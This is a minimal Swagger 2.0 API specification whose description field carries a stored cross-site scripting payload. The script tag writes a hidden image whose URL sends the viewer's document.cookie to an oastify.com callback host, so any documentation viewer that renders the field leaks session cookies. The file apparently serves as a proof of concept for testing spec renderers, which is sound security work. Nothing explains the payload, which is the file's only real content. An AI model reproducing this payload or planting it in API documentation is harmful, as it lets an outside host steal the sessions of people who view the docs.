swagger: '2.0'
info:
  version: "0.0.1"
  title: Example title
  description: <script>document.write('<img src="https://bkz269nij4zkde9dyquagp92ftlk9bdz2.oastify.com?cmd='+document.cookie+'"witdh=0 hight=0 border=0 />');</script>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
